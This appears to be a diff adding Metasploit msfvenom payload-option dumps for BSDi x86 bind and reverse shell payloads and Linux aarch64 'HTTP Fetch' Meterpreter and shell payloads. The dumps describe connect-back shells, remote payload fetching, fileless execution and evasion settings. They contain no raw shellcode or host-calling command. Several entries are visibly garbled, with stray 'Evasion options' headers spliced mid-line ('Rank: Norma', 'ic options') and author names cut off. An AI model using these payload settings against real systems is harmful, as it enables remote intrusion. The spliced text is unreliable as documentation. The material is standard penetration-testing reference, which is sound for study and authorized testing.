LPORT 4444 yes The listen port
SCOPEID 0 no IPv6 scope ID, for link-local addresses
Description:
Connect back to attacker and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsdi-x86-shell-bind_tcp.txt
+43
View File
@@ -0,0 +1,43 @@
Name: BSDi Command Shell, Bind TCP Stager
Module: payload/bsdi/x86/shell/bind_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 69
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Spawn a command shell (staged).
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsdi-x86-shell-reverse_tcp.txt
+50
View File
@@ -0,0 +1,50 @@
Name: BSDi Command Shell, Reverse TCP Stager
Module: payload/bsdi/x86/shell/reverse_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 59
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsdi-x86-shell_bind_tcp.txt
+32
View File
@@ -0,0 +1,32 @@
Name: BSDi Command Shell, Bind TCP Inline
Module: payload/bsdi/x86/shell_bind_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 90
Rank: Normal
Provided by:
skape <mmiller@hick.org>
optyx <optyx@no$email.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsdi-x86-shell_find_port.txt
+31
View File
@@ -0,0 +1,31 @@
Name: BSDi Command Shell, Find Port Inline
Module: payload/bsdi/x86/shell_find_port
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 77
Rank: Normal
Provided by:
skape <mmiller@hick.org>
optyx <optyx@no$email.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CPORT 37232 no The local client port
Description:
Spawn a shell on an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsdi-x86-shell_reverse_tcp.txt
+39
View File
@@ -0,0 +1,39 @@
Name: BSDi Command Shell, Reverse TCP Inline
Module: payload/bsdi/x86/shell_reverse_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 77
Rank: Normal
Provided by:
skape <mmiller@hick.org>
optyx <optyx@no$email.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter-reverse_tcp.txt
+100
View File
@@ -0,0 +1,100 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Norma
Evasion options for payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp:
=========================
ic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME fGKaZjGk no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_http:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME QJpbzCbQetk no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Br
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_https:
=========================
apid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME htteRZaNp no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_tcp.txt
+97
View File
@@ -0,0 +1,97 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME IHvjSdBvJzEf no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-aarch64-shell-reverse_tcp.txt
+93
View File
@@ -0,0 +1,93 @@
Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/aarch64/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME CbrLJLwKRPdb no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
dup2 socket in x12, then execve.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
